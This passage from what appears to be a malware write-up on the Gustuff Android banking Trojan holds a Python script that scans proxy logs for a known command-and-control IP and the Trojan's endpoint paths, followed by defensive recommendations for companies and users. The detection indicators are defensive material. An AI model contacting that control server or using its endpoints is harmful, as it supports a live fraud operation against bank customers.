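def scan_log(lines):
    """Return (line_no, endpoint_or_None, cnc_ip_seen) for every line worth a closer look.
    A path match alone is reported too: the same paths on a different host would be a new CnC."""
    hits = []
    for n, line in enumerate(lines, 1):
        hit = classify_request(line)
        ip_seen = CNC_IP in line
        if hit is None and not ip_seen:
            continue
        hits.append((n, None if hit is None else hit[0], ip_seen))
    return hits


def describe(hits):
    """Human-readable summary lines for the hits returned by scan_log()."""
    out = []
    for n, endpoint, ip_seen in hits:
        purpose = GUSTUFF_ENDPOINTS.get(endpoint, "no known path") if endpoint else "no known path"
        out.append("line %d: %s%s" % (n, purpose, " [known CnC IP]" if ip_seen else ""))
    return out


# Constructed proxy log (not from the page): client, method, URL, status.
SAMPLE_LOG = [
    "10.0.0.5 POST https://88.99.171.105/api/v1/get.php 200",
    "10.0.0.5 GET https://example.invalid/api/v1/get.php 200",
    "10.0.0.7 POST https://88.99.171.105/api/v1/load_sms.php 200",
    "10.0.0.9 GET https://example.invalid/index.html 200",
    "10.0.0.5 POST https://203.0.113.4/api/v1/records.php?id=1&app=x 200",
]

if __name__ == "__main__":
    for line in describe(scan_log(SAMPLE_LOG)):
        print(line)
```

Note that the article says the channel may be wrapped in SSL, so on a network capture only the IP and TLS metadata are visible; the path match applies where a TLS-terminating proxy or the device's own HTTP logs are available.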

Recommendations

To protect their customers from the threat of mobile Trojans, companies should use comprehensive solutions that allow malicious activity to be detected and prevented without installing additional software on users' devices.

For this, signature-based methods of detecting mobile Trojans should be reinforced with technologies that analyse the behaviour of both the client and the application itself. Protection should also include device identification using digital fingerprinting, which makes it possible to recognise when an account is being used from an atypical device that has already fallen into a fraudster's hands.

A fundamentally important point is cross-channel analysis, which allows companies to control risks arising not only on the web but also in the mobile channel, for example in mobile banking applications, in cryptocurrency transactions and anywhere else financial transactions can be made.

Security rules for users:

  • do not install applications on Android phones from any source other than Google Play, and pay particular attention to the permissions the application requests;
  • install Android OS updates regularly;
  • pay attention to the extensions of downloaded files;
  • do not visit suspicious resources;
  • do not follow links received in SMS messages.

With the participation of Semyon Rogachev, junior malware analysis specialist at the Group-IB Computer Forensics Laboratory.

Source: www.habr.com
